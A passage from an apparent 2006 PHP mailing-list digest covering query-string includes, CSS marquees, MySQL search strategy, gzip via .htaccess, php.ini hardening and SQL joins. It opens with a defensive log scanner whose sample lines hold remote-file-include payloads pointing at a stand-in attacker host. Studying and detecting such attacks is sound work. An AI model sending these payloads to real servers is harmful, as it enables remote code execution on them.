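    '198.51.100.7 - - [13/Nov/2006:09:14:44 -0500] "GET /exploited.php?action=http://evil.example.com/inject.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [13/Nov/2006:09:14:51 -0500] "GET /exploited.php?action=http%3A%2F%2Fevil.example.com%2Finject.txt%3F HTTP/1.0" 404 210',
    '192.0.2.33 - - [13/Nov/2006:09:20:03 -0500] "GET /article.php?title=http+basics&id=7 HTTP/1.1" 200 8841',
];

foreach (find_remote_include_attempts($log) as $hit) {
    printf(
        "line %d  %s  status %d  %s=%s\n",
        $hit['line'], $hit['client'], $hit['status'], $hit['param'], $hit['value']
    );
}
```

Parameters that legitimately carry URLs (redirect targets, feed addresses) will also match, so compare each hit against what the requested script actually does with that parameter.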
Re: [PHP] How do you do the ? mark after a filename
Thomas Bonham wrote:
> I keep seeing the ? mark after many file names index.php?id=234. So what I would like to know is how do you make them. I have heard that they can make a programs life simpler when doing some things with a database.

in my scripts, i do it with the switch-syntax

=== snip ===
<?php
// Only the file names listed here can ever be included; the request
// value just selects one of them.
$x = isset($_GET['x']) ? $_GET['x'] : '';
switch ($x) {
    case "show":
        include("show.php");
        break;
    case "search":
        include("search.php");
        break;
    case "new":
        include("add_entry.html");
        break;
    default:
        include("show.php");
        break;
}
?>
=== snip ===

now you can enter http://www.domain.at/index.php?x=search; or x=show;

cu, norbert.
[PHP] Scrolling text
Hi, I would like to have a scrolling text (as banner) on our website. I tried Marquee which work very well but since i use a table and allocate 100% to marquee, if the content of a row (tr content) is greater than 100% or the table width, internet explorer automatically write the message on several lines (not several tr). e.g : sentence to display : this is a very long sentence about the way how works internet explorer with marquee way how is it displays under IE : this is a very long sentence about the way how works internet explorer with marquee under opera and firefow, it's well displayed as this is a very long sentence about the way how works internet explorer with marquee so, i would like to know if there is another way how to do a scrolling text without using flash, shockwave or other tool...only in php or HTML (in worse case). thanks a lot, -- Alain Windows XP SP2 PostgreSQL 8.1.4 Apache 2.0.58 PHP 5
Re: [PHP] Scrolling text
On Mon, 2006-11-13 at 20:22 +0100, Alain Roger wrote:
> Hi,
>
> I would like to have a scrolling text (as banner) on our website. I tried Marquee which work very well but since i use a table and allocate 100% to marquee, if the content of a row (tr content) is greater than 100% or the table width, internet explorer automatically write the message on several lines (not several tr).
>
> e.g :
> sentence to display : this is a very long sentence about the way how works internet explorer with marquee
>
> way how is it displays under IE :
> this is a very long sentence about the way how works internet explorer with marquee
>
> under opera and firefox, it's well displayed as
> this is a very long sentence about the way how works internet explorer with marquee
>
> so, i would like to know if there is another way how to do a scrolling text without using flash, shockwave or other tool...only in php or HTML (in worse case).
>
> thanks a lot,

This works really well without the annoyance:

<div style="overflow: scroll; white-space: nowrap;">
this is a very long sentence about the way how works internet explorer with marquee
</div>

Cheers,
Rob.
--
InterJinn Application Framework - http://www.interjinn.com
An application and templating framework for PHP. Boasting a powerful, scalable system for accessing system services such as forms, properties, sessions, and caches. InterJinn also provides an extremely flexible architecture for creating re-usable components quickly and easily.
Re: [PHP] one click - two actions?
I really don't know? My site is all php and ready to go live except for this little problem. I would really appreciate some help. On Nov 13, 2006, at 4:12 AM, John Meyer wrote: Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go?
[PHP] Problem with PHP 5.2.0
Hi. I just installed PHP 5.2.0 and I'm running into some strange problems. I have a rather large program which uses sockets, pcntl, posix, pdo (mysql), and is fully object oriented. The program is rather large and is about 75,000 lines of code. When I run the application with PHP 5.1.6, I can execute commands in around 0.6 to 0.8 seconds, uses less then 1% cpu power, and takes around 14 megs of ram. I installed PHP 5.2.0 and when I execute a command (through my application), it takes 9 to 12 seconds to complete, it uses 100% cpu power, and eats about 180 megs of ram. Nothing changed other then installing PHP 5.2.0. I have reinstalled 5.1.6 and everything is back to normal. I have compiled both versions the exact same way with the same command line options. Are there any outstanding issues with PHP 5.2.0? Anyone have any similar problems? I don't want to go through my source code to find where 5.2.0 is hanging so I'm hoping there is a known issue already documented out there. Here is config line: ./configure --prefix=/usr/local/php5 --libdir=/usr/local/php --with-config-file-path=/usr/local/php --with-zlib --with-mcrypt --enable-cli --without-pear --enable-libgcc --with-curl --enable-sockets --enable-pcntl --enable-posix --enable-sigchild --disable-cgi --with-pdo-mysql --with-imap-ssl=/usr/local/imap-2006c1 --with-openssl --enable-ftp Any help would be appreciated. Thanks, John W. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] one click - two actions?
Mel, that may have been a disguised hint. Your answer lies in javascript. The first php page needs to contain javascript to open a second page with the URL to the second php script when the first page loads. Keep a couple of things in mind, popup blockers will reek havoc if you can't get visitors to your site to stop blocking popups and if you expect both URLs to receive form contents, you will have to make arrangements for that in the javascript in your first page, since it will need to pass the data again. Check out http://www.hotscripts.com for some links to sites with the necessary javascript. Hope this helps, Warren Vail -Original Message- From: Mel [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 12:32 PM To: John Meyer Cc: PHP General List Subject: Re: [PHP] one click - two actions? I really don't know? My site is all php and ready to go live except for this little problem. I would really appreciate some help. On Nov 13, 2006, at 4:12 AM, John Meyer wrote: Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
Dotan Cohen wrote: If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended: 1) 30 searches, one for each keyword 2) To select the varchar field from all the rows, and search through them with php's array functions? It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. If you are worried about the speed of this query I'd suggest rethinking your database structure. Text field comparisons will always be relatively slow compared to numeric comparisons or numeric lookups. My reading of this query however is that it should be 30 OR comparisons, no joins involved. In this case the query will scale linearly with your database size so you shouldn't worry too much about it slowing down over time. David -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] one click - two actions?
Thank you for your reply. I think my question is really much more simple than what you are suggesting. If you have a quick look at http://www.squareinch.net/single_page.php?art=crp_logo.jpg you will see what I mean. I have a single page and both results load in the same page. When I click on a link the picture loads on the left side and the info should load on the right side. Right now the info is visible at all times regardless of what I click on! I need to know how to join my echo statements and/or my query! On Nov 13, 2006, at 12:57 PM, Warren Vail wrote: Mel, that may have been a disguised hint. Your answer lies in javascript. The first php page needs to contain javascript to open a second page with the URL to the second php script when the first page loads. Keep a couple of things in mind, popup blockers will reek havoc if you can't get visitors to your site to stop blocking popups and if you expect both URLs to receive form contents, you will have to make arrangements for that in the javascript in your first page, since it will need to pass the data again. Check out http://www.hotscripts.com for some links to sites with the necessary javascript. Hope this helps, Warren Vail -Original Message- From: Mel [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 12:32 PM To: John Meyer Cc: PHP General List Subject: Re: [PHP] one click - two actions? I really don't know? My site is all php and ready to go live except for this little problem. I would really appreciate some help. On Nov 13, 2006, at 4:12 AM, John Meyer wrote: Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
On Tue, 2006-11-14 at 00:51 +1100, David Tulloh wrote: Dotan Cohen wrote: If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended: 1) 30 searches, one for each keyword 2) To select the varchar field from all the rows, and search through them with php's array functions? It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. If you are worried about the speed of this query I'd suggest rethinking your database structure. Text field comparisons will always be relatively slow compared to numeric comparisons or numeric lookups. My reading of this query however is that it should be 30 OR comparisons, no Except that most search engines refine the search when you add more keywords in contrast to your suggestion of expanding the search :) Cheers, Rob. -- .. | InterJinn Application Framework - http://www.interjinn.com | :: | An application and templating framework for PHP. Boasting | | a powerful, scalable system for accessing system services | | such as forms, properties, sessions, and caches. InterJinn | | also provides an extremely flexible architecture for | | creating re-usable components quickly and easily. | `' -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Compressing both php and linked css files with ob_gzhandler and htaccess
Can I compress a php file AND its referenced css files at the same time ?

Currently, I am using ob_gzhandler to compress my php files only . Works great:)

As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz,

These files are in my CSS folder along with style.css. .

.htaccess

    AddHandler application/x-httpd-php .css
    php_value auto_prepend_file gzip-css.php
    php_flag zlib.output_compression On

gzip-css.php

    <?php
    ob_start ("ob_gzhandler");
    header("Content-type: text/css; charset: UTF-8");
    header("Cache-Control: must-revalidate");
    $offset = 60 * 60 ;
    $ExpStr = "Expires: " . gmdate("D, d M Y H:i:s", time() + $offset) . " GMT";
    header($ExpStr);
    ?>

many thanks as I am learning the ins and outs of htaccess and ob_gzhandler
Re: [PHP] Compressing both php and linked css files with ob_gzhandler and htaccess
Graham Anderson wrote:
> Can I compress a php file AND its referenced css files at the same time ?
>
> Currently, I am using ob_gzhandler to compress my php files only . Works great:)
>
> As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz,

er ...

> These files are in my CSS folder along with style.css. .
>
> .htaccess
>
>     AddHandler application/x-httpd-php .css
>     php_value auto_prepend_file gzip-css.php
>     php_flag zlib.output_compression On

php_flag zlib.output_compression Off

no?

> gzip-css.php
>
>     <?php
>     ob_start ("ob_gzhandler");
>     header("Content-type: text/css; charset: UTF-8");
>     header("Cache-Control: must-revalidate");
>     $offset = 60 * 60 ;
>     $ExpStr = "Expires: " . gmdate("D, d M Y H:i:s", time() + $offset) . " GMT";
>     header($ExpStr);
>     ?>
>
> many thanks as I am learning the ins and outs of htaccess and ob_gzhandler
Re: [PHP] Compressing both php and linked css files with ob_gzhandler and htaccess
yes :) I DID try that strangely, turning it off disables/kills the css file g On Nov 13, 2006, at 2:08 PM, Jochem Maas wrote: Graham Anderson wrote: Can I compress a php file AND its referenced css files at the same time ? Currently, I am using ob_gzhandler to compress my php files only . Works great:) As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz, er ... These files are in my CSS folder along with style.css. . .htaccess AddHandler application/x-httpd-php .css php_value auto_prepend_file gzip-css.php php_flag zlib.output_compression On php_flag zlib.output_compression Off no? gzip-css.php ?php ob_start (ob_gzhandler); header(Content-type: text/css; charset: UTF-8); header(Cache-Control: must-revalidate); $offset = 60 * 60 ; $ExpStr = Expires: . gmdate(D, d M Y H:i:s, time() + $offset) . GMT; header($ExpStr); ? many thanks as I am learning the ins and outs of htaccess and ob_gzhandler --PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Compressing both php and linked css files with ob_gzhandler and htaccess
Unfortunately, I am on a shared server for this project :( Is there some way to enable mod_deflate without admin server privs? many thanks On Nov 13, 2006, at 1:59 PM, steve wrote: Why use php to compress at all? Use mod_deflate. On 11/13/06, Graham Anderson [EMAIL PROTECTED] wrote: Can I compress a php file AND its referenced css files at the same time ? Currently, I am using ob_gzhandler to compress my php files only . Works great:) As I have found that you CAN NOT use ob_gz and zlib at the same time, how do I amend the htaccess file to use ob_gz, These files are in my CSS folder along with style.css. . .htaccess AddHandler application/x-httpd-php .css php_value auto_prepend_file gzip-css.php php_flag zlib.output_compression On gzip-css.php ?php ob_start (ob_gzhandler); header(Content-type: text/css; charset: UTF-8); header(Cache-Control: must-revalidate); $offset = 60 * 60 ; $ExpStr = Expires: . gmdate(D, d M Y H:i:s, time() + $offset) . GMT; header($ExpStr); ? many thanks as I am learning the ins and outs of htaccess and ob_gzhandler -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] one click - two actions?
Mel, Not sure if I understand your question now or not, but here goes. In order to prepare your page you want to be able to click a link on the left and have the page on the right replaced with something in response. Technically when php prepares the page, it prepares both sides (unless you are using frames). If preparing each side requires different queries against your database, you can certainly do two database queries in the same execution. When you first posed your question you talked about starting two pages at once. What I see is one page. Perhaps if you used frames you could cause the left frame to be a separate PHP script and the one on the right another, this would allow your server to process both requests simultaneously, perhaps this is what you meant? Technically they are still part of the one page, but each would be a separate frame within the page. Caution about using technical terms, in your first message you referred to separate pages when (I believe) you may have been referring to one page (yes, page is a technical term) and in your second message you used a term Join which has a meaning when running queries on your database, causing me to think for a moment that your question had been about retrieving information from your database, which you seemed to mention. If you opt to use frames and are new to PHP programming, or programming with frames, expect difficulties (use of Target consistently is the key). I avoid frames unless I simply can't do what I want to do without the use of them. I think at one time some browsers didn't support frames, not sure any more. Warren Vail -Original Message- From: Mel [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 1:32 PM To: Warren Vail Cc: 'John Meyer'; 'PHP General List' Subject: Re: [PHP] one click - two actions? Thank you for your reply. I think my question is really much more simple than what you are suggesting. 
If you have a quick look at http://www.squareinch.net/single_page.php?art=crp_logo.jpg you will see what I mean. I have a single page and both results load in the same page. When I click on a link the picture loads on the left side and the info should load on the right side. Right now the info is visible at all times regardless of what I click on! I need to know how to join my echo statements and/or my query! On Nov 13, 2006, at 12:57 PM, Warren Vail wrote: Mel, that may have been a disguised hint. Your answer lies in javascript. The first php page needs to contain javascript to open a second page with the URL to the second php script when the first page loads. Keep a couple of things in mind, popup blockers will reek havoc if you can't get visitors to your site to stop blocking popups and if you expect both URLs to receive form contents, you will have to make arrangements for that in the javascript in your first page, since it will need to pass the data again. Check out http://www.hotscripts.com for some links to sites with the necessary javascript. Hope this helps, Warren Vail -Original Message- From: Mel [mailto:[EMAIL PROTECTED] Sent: Monday, November 13, 2006 12:32 PM To: John Meyer Cc: PHP General List Subject: Re: [PHP] one click - two actions? I really don't know? My site is all php and ready to go live except for this little problem. I would really appreciate some help. On Nov 13, 2006, at 4:12 AM, John Meyer wrote: Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
David Tulloh wrote: Dotan Cohen wrote: If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended: 1) 30 searches, one for each keyword 2) To select the varchar field from all the rows, and search through them with php's array functions? It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. I'd say there will be a big difference. Pulling in 10,000 entries from the database and then sorting them in php will take a lot of memory (and database time to retrieve all of the entries). Getting the database to restrict that number of entries will take a little time but it doesn't have to return all entries, your php memory won't blow out and it won't have bugs in it. -- Postgresql php tutorials http://www.designmagick.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mysql strategy
On Monday 13 November 2006 17:51, Chris wrote: It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster. I'd say there will be a big difference. Pulling in 10,000 entries from the database and then sorting them in php will take a lot of memory (and database time to retrieve all of the entries). Getting the database to restrict that number of entries will take a little time but it doesn't have to return all entries, your php memory won't blow out and it won't have bugs in it. As a general rule, I try to push as much logic into the query as I can for the simple reason that MySQL is optimized C and my PHP code gets interpreted. The odds of me writing something in PHP that's faster than MySQL AB's C code are slim. :-) The exception is grouping, which I've often had to do in PHP with a loop to rebuild a result array. The performance hit for that is not that big, however, and if you free() the result set afterward then the memory usage is not a major issue either. If you're finding your query is slow, look into your indexes. Just today I cut a single query from 230 seconds to 21 seconds just by adding two indexes. :-) -- Larry Garfield AIM: LOLG42 [EMAIL PROTECTED] ICQ: 6817012 If nature has made any one thing less susceptible than all others of exclusive property, it is the action of the thinking power called an idea, which an individual may exclusively possess as long as he keeps it to himself; but the moment it is divulged, it forces itself into the possession of every one, and the receiver cannot dispossess himself of it. -- Thomas Jefferson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Problem with PHP 5.2.0
This one time, at band camp, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
> Hi. I just installed PHP 5.2.0 and I'm running into some strange problems.

xdebug

Kevin
--
Democracy is two wolves and a lamb voting on what to have for lunch. Liberty is a well-armed lamb contesting the vote.
Re: [PHP] server side security
H. Dan Phillips wrote:
> Let me begin by saying I'm a newbie to PHP and open source. I setup a windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our developers to start building a new web based application. The developer will be using PHP myadmin for his purposes. The settings that were used were ones posted out on many web sites for this combo.
>
> I'm looking for detailed instructions to secure the server from the standpoint of the server OS, php.ini and mysql. The developer will be securing access to the application from his end but I want to make sure that the server also remain secure. It will only be used within our intra-net and only by a handful of people.
>
> Any and all suggestions will be greatly appreciated.

We can't offer advice on the OS or mysql - find a more specific mailing list for those questions.

For the php.ini, disable allow_url_fopen (or if you're using php 5.2.0, disable allow_url_include at least) and disable register_globals.

Depending on what the application does, I'd look at disabling exec, system and the like (see http://php.net/exec look for disable_functions in the php.ini file).

Turn off enable_dl unless you have a specific need for it.

Only enable the extensions you need to use (ie don't enable oracle support if you aren't going to use it).

Having said that - most of the php security problems relate to the application, rather than the php.ini file.

--
Postgresql php tutorials
http://www.designmagick.com/
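The php.ini advice in this reply expressed as a check (added example, not the poster's code). audit_php_ini() and ini_is_on() are hypothetical names, the two settings arrays are constructed, and the functions beyond exec and system in the default list are an assumption about what "and the like" covers.

```php
<?php
// Added example; not code from the thread. Names are hypothetical.

// php.ini booleans arrive as strings such as "1", "On", "0", "" or "Off".
function ini_is_on($value): bool
{
    return in_array(strtolower(trim((string) $value)), ['1', 'on', 'yes', 'true'], true);
}

// $ini maps setting name => value, e.g. from ini_get_all(null, false).
// exec and system come from the reply; the rest of the default list is assumed.
function audit_php_ini(
    array $ini,
    array $riskyFunctions = ['exec', 'system', 'passthru', 'shell_exec', 'popen', 'proc_open']
): array {
    $findings = [];

    if (ini_is_on($ini['register_globals'] ?? '0')) {
        $findings[] = 'register_globals is On: request parameters become variables';
    }

    // allow_url_include exists from PHP 5.2.0 on. Before that, allow_url_fopen
    // alone decided whether include() accepted remote URLs.
    if (array_key_exists('allow_url_include', $ini)) {
        if (ini_is_on($ini['allow_url_include'])) {
            $findings[] = 'allow_url_include is On: include() accepts remote URLs';
        }
        if (ini_is_on($ini['allow_url_fopen'] ?? '0')) {
            $findings[] = 'allow_url_fopen is On: keep only if the application needs remote fopen';
        }
    } elseif (ini_is_on($ini['allow_url_fopen'] ?? '0')) {
        $findings[] = 'allow_url_fopen is On and allow_url_include is not available: '
                    . 'include() accepts remote URLs';
    }

    if (ini_is_on($ini['enable_dl'] ?? '0')) {
        $findings[] = 'enable_dl is On: scripts can load extensions at runtime';
    }

    $disabled = array_filter(array_map('trim', explode(',', (string) ($ini['disable_functions'] ?? ''))));
    $missing  = array_values(array_diff($riskyFunctions, $disabled));
    if ($missing !== []) {
        $findings[] = 'not in disable_functions: ' . implode(', ', $missing);
    }

    return $findings;
}

// Constructed settings: a pre-5.2.0 style weak configuration and a hardened one.
$weak = [
    'register_globals'  => 'On',
    'allow_url_fopen'   => '1',
    'enable_dl'         => '1',
    'disable_functions' => '',
];
$hardened = [
    'register_globals'  => 'Off',
    'allow_url_fopen'   => 'Off',
    'allow_url_include' => 'Off',
    'enable_dl'         => 'Off',
    'disable_functions' => 'exec, system, passthru, shell_exec, popen, proc_open',
];

$targets = [
    'constructed weak'     => $weak,
    'constructed hardened' => $hardened,
    'this interpreter'     => ini_get_all(null, false),   // live values, name => value
];
foreach ($targets as $label => $ini) {
    $findings = audit_php_ini($ini);
    echo $label, ': ', $findings === [] ? 'no findings' : '', "\n";
    foreach ($findings as $finding) {
        echo '  - ', $finding, "\n";
    }
}
```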
RE: [PHP] server side security
assuming this is possible - not a sys admin - so can be way out of my league

Have you thought not having it available on the open web? Put it behind a firewall and make it so only local ips on the LAN can access it with strong passwords.

MySQL - make sure you change the default root user password to something hard - and create only users with the minimum permissions needed that can only access say from the localhost.

/assumption

-----Original Message-----
From: H. Dan Phillips [mailto:[EMAIL PROTECTED]
Sent: Tuesday, November 14, 2006 1:44 AM
To: php-general@lists.php.net
Subject: [PHP] server side security

Let me begin by saying I'm a newbie to PHP and open source. I setup a windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our developers to start building a new web based application. The developer will be using PHP myadmin for his purposes. The settings that were used were ones posted out on many web sites for this combo.

I'm looking for detailed instructions to secure the server from the standpoint of the server OS, php.ini and mysql. The developer will be securing access to the application from his end but I want to make sure that the server also remain secure. It will only be used within our intra-net and only by a handful of people.

Any and all suggestions will be greatly appreciated.

Thks
Dan Phillips
Re: [PHP] problem with php[4,5] (horde 2/3)
Norbert Ehart wrote:
> hello,
>
> i have some problem with horde, after my isp have upgraded php on my vps! i only get some error messages.
>
> Notice: Only variable references should be returned by reference in /usr/share/horde3/lib/Horde/Perms.php on line 343
>
> Notice: Only variable references should be returned by reference in /usr/share/horde3/lib/Horde/Auth.php on line 1193
>
> Warning: Cannot modify header information - headers already sent by (output started at /usr/share/horde3/lib/Horde/Perms.php:343) in /usr/share/horde3/index.php on line 51

Talk to the horde mailing list / forum. They need to fix this properly.

--
Postgresql php tutorials
http://www.designmagick.com/
Re: [PHP] one click - two actions?
At 11/13/2006 01:28 AM, Mel wrote:
> Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image, when I click on a link, without repeating the entire query? The image and the description are both in the same table in my database.
>
> I now show the image when I click on the link which is good, but the description stays on at all times instead of appearing only when active.
>
> http://www.squareinch.net/single_page.php

Mel,

I think what you're looking for is JOIN syntax for your queries:
http://dev.mysql.com/doc/refman/4.1/en/join.html

For example:

    SELECT * FROM client, job
    WHERE client.companyId=job.companyId
    AND (client.status='active' or client.status='old')
    order by client.companyName;

(Note that when you extract fields from more than one table like this, you identify the table that each field belongs to, e.g. client.companyId.)

Then you can extract the desired fields from both tables in the same loop because they've been captured together. Your current logic executes a job query for every row of client, which is extremely inefficient.

The dataset produced by the join query is going to look something like this:

    client.      job.
    companyId    companyId
    1            2
    1            3
    1            9
    2            4
    2            5
    ...

In other words, there will be one row for each job record, with the (parent) client fields duplicated each row.

You can further improve the efficiency of your query by naming only the fields you need, instead of using * to extract all fields:

    SELECT client.companyName, job.pix, job.jobType, job.url, job.web
    FROM client, job
    WHERE client.companyId=job.companyId
    AND (client.status='active' or client.status='old')
    order by client.companyName;

Once you execute the join query, your PHP loop can cycle in a similar way, echoing a company name and then listing all the job types until a new company name occurs, etc.

You've got other problems, however. If you look at your HTML source, you'll see markup like this:

    <span class='navCompany'>Builtworks</span><span class='navArrow'> </span>
    <span class='navText'><a href='single_page.php?art=btw_logo.jpg'>logo</a></span>
    <span class='navText'><a href='single_page.php?art='></a></span>
    <span class='navText'><a href='single_page.php?art='></a></span>
    <span class='navText'><a href='single_page.php?art='></a></span>
    <span class='navText'><a href='single_page.php?art='></a></span>
    <br><span class='navCompany'>Citizens Bank / eProperty</span><span class='navArrow'> </span>
    <span class='navText'><a href='single_page.php?art=ctz_web1.jpg'>website</a></span>

All those empty hyperlinks aren't doing anything but making your download heavier than it has to be. I think you need to test your 'jobType' fields and output only those that aren't blank.

Finally, to answer one of your questions, your logic to display the description area has a snarl of syntax flaws:

    /* query 2 from job */
    ...
    foreach($row as $url)
    {
    $row = mysql_fetch_array($result2,MYSQL_ASSOC);
    if ("url={$row['url']}")
    echo "<span class='navText'><a href='{$row['url']}'>{$row['web']}</a></span>";
    }

You're testing

    if ("url={$row['url']}")

1) Because you've put that expression in quotes, you're testing the true/false value of a string expression which will always test true unless it's blank, which this one will never be. Expressing it as a string might be correct if you were using eval(), but you're not and you're safer not to. Eval() can get you into big trouble if there are PHP code fragments in your database fields; until you get better control of your logic I urge you not to use it.

2) You omitted the $ in front of $url.

3) You used a single equal sign instead of two. This:

    if ($url = $row['url'])

tests whether $row['url'] is blank, and also sets $url equal to that value. I think you meant this:

    if ($url == $row['url'])

which tests whether the variable $url is equal to the database field $row['url'].
Good luck,
Paul

> This is the code I have for the image area:
>
> /* query 1 from client */
> $query = "SELECT * FROM client where status='active' or status='old' order by companyName";
> $result = mysql_query($query) or die ("Couldn't execute query");
> while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC))
> {
> echo "<span class='navCompany'>{$aaa['companyName']}</span><span class='navArrow'> </span>\n";
>
> /* query 2 from job */
> $query = "SELECT * FROM job WHERE companyId='{$aaa['companyId']}'";
> $result2 = mysql_query($query) or die ("Couldn't execute query2");
> foreach($aaa as $jobType)
> {
> $bbb =
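
The single join query and the company-by-company loop described in Paul's reply, as an added example that is not part of the original thread. It assumes PDO with an in-memory SQLite database standing in for the MySQL tables, uses constructed sample rows, and the helpers h() and renderNav() are hypothetical names; escaping the database values on output is an addition of this example.

```php
<?php
// Added example. Constructed sample rows in an in-memory SQLite database stand
// in for the thread's MySQL tables (assumes the pdo_sqlite extension is loaded).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE client (companyId INTEGER, companyName TEXT, status TEXT)");
$db->exec("CREATE TABLE job (companyId INTEGER, jobType TEXT, pix TEXT)");
$db->exec("INSERT INTO client VALUES (1, 'Builtworks', 'active'),
           (2, 'Citizens Bank / eProperty', 'old'), (3, 'Dormant & Co', 'closed')");
$db->exec("INSERT INTO job VALUES (1, 'logo', 'btw_logo.jpg'), (1, '', ''),
           (2, 'website', 'ctz_web1.jpg'), (3, 'logo', 'dormant.jpg')");

// Hypothetical helper: HTML-escape a value read from the database.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Hypothetical helper: build the navigation markup from one join query
// instead of running a job query for every client row.
function renderNav(PDO $db): string
{
    $sql = "SELECT client.companyName, job.jobType, job.pix
            FROM client, job
            WHERE client.companyId = job.companyId
            AND (client.status = 'active' OR client.status = 'old')
            ORDER BY client.companyName";
    $html = '';
    $current = null;
    foreach ($db->query($sql, PDO::FETCH_ASSOC) as $row) {
        if ($row['companyName'] !== $current) {
            // Company changed: close the previous group, print the new name once.
            if ($current !== null) {
                $html .= "<br>\n";
            }
            $current = $row['companyName'];
            $html .= "<span class='navCompany'>" . h($current) . "</span>\n";
        }
        if (trim((string) $row['jobType']) === '') {
            continue; // blank jobType: emit no empty hyperlink
        }
        $html .= "<span class='navText'><a href='single_page.php?art="
            . h(rawurlencode((string) $row['pix'])) . "'>"
            . h($row['jobType']) . "</a></span>\n";
    }
    return $html;
}

echo renderNav($db);
```

With the constructed rows, each active or old company name appears once, the blank job row produces no link, and the 'closed' client is filtered out by the WHERE clause.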